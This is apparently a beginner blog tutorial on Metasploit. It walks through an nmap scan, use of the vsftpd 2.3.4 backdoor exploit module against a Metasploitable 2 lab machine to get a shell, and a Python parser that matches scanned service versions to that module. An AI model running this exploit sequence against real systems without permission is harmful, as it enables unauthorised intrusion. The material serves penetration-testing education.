Learning Metasploit: From Scanning to Shell Access

What is Metasploit? Why should we use it?
Metasploit is one of the most powerful and widely used tools in the field of ethical hacking and penetration testing. It’s an open-source framework that helps security professionals identify, exploit, and validate vulnerabilities in systems. Whether you're a beginner learning the basics or an advanced penetration tester, Metasploit provides a structured environment to simulate real-world attacks, develop payloads, and test defenses — all legally and safely.
How Does Metasploit Work?
Metasploit works by using a modular system that allows you to launch attacks in a controlled environment. It consists of:
Exploit Modules – Code that takes advantage of a specific vulnerability.
Payloads – What runs after successful exploitation (like opening a reverse shell).
Auxiliary Modules – Tools for scanning, fuzzing, sniffing, and more.
Encoders – Transform a payload's bytes, mainly to avoid characters the exploit cannot deliver; they can defeat simple signature matching but are not a reliable way to bypass modern antivirus or firewalls.
Listeners (handlers) – Wait for the payload to connect back to your system.
In simple terms:
You scan a system → find a vulnerability → launch an exploit → gain access → interact with the target.
Metasploit automates much of this, making it perfect for learning how real-world attacks happen — legally and safely.
Real Example: Exploiting a Target with Metasploit
Let’s walk through a simple example of how Metasploit can be used to exploit a vulnerable machine. For this demo, I used Kali Linux as the attacker machine and Metasploitable 2 as the target.
Step 1: Scanning the Target with Nmap
First, we use Nmap to identify open ports and services:
```bash
nmap -sV 192.168.1.100
```
This shows services like FTP, SSH, and Apache running — now we know what’s available to attack.
Step 2: Launching Metasploit Framework
Start Metasploit with:
```bash
msfconsole
```
Then search for an exploit:
```bash
search vsftpd
```
Let’s say the search returns:
```
exploit/unix/ftp/vsftpd_234_backdoor
```
Step 3: Using the Exploit
```bash
use exploit/unix/ftp/vsftpd_234_backdoor
# Current Metasploit versions name this option RHOSTS; RHOST is accepted as an alias.
set RHOST 192.168.1.100
run
```
Boom — if the target is vulnerable, Metasploit gives you shell access (other exploits and payloads can give a Meterpreter session instead).
Step 4: Interact with the Target
Once you’re in, you can use commands like:
```bash
whoami
uname -a
```
You now have access — like a real hacker. But remember, always test legally!
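Steps 1 and 2 are where most of the bookkeeping happens: you scan, then you look up which discovered service has a known issue. The following parser is an added example (not part of the original post) that turns the PORT/STATE/SERVICE/VERSION table printed by `nmap -sV` into records and matches them against a watch list; the Nmap output is constructed to resemble Metasploitable 2, and the watch list is a hypothetical mapping whose only entry is the module named above.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of `nmap -sV` normal output, modelled on the
# Metasploitable 2 services the tutorial mentions (FTP, SSH, Apache).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.168.1.100
Host is up (0.00045s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.4
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5
"""

# Hypothetical watch list: version prefix -> Metasploit module to review next.
# Only the vsftpd entry comes from the tutorial; extend it for your own lab.
WATCHLIST: Dict[str, str] = {
    "vsftpd 2.3.4": "exploit/unix/ftp/vsftpd_234_backdoor",
}

# One row of the Nmap port table: "21/tcp   open  ftp     vsftpd 2.3.4"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


def parse_nmap_sv(text: str) -> List[dict]:
    """Return one dict per open port; header and summary lines are skipped."""
    results = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group("state") != "open":
            continue
        results.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "service": m.group("service"),
            "version": (m.group("version") or "").strip(),
        })
    return results


def match_watchlist(services: List[dict],
                    watchlist: Dict[str, str] = WATCHLIST) -> List[Tuple[dict, str]]:
    """Pair each open service whose version starts with a watch-listed string with its module."""
    return [(svc, module) for svc in services
            for prefix, module in watchlist.items()
            if svc["version"].startswith(prefix)]
```

Running `match_watchlist(parse_nmap_sv(SAMPLE_NMAP_OUTPUT))` on the sample yields exactly one hit, the vsftpd 2.3.4 service on port 21 paired with the module used in Step 3.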
Disclaimer
This tutorial is for educational purposes only. Always get permission before testing any system.
Understanding Metasploit is an important step for anyone learning about cybersecurity. With practice, ethical intent, and the right labs, it becomes a crucial skill in a pentester's toolbox.
Written by Prerit Singh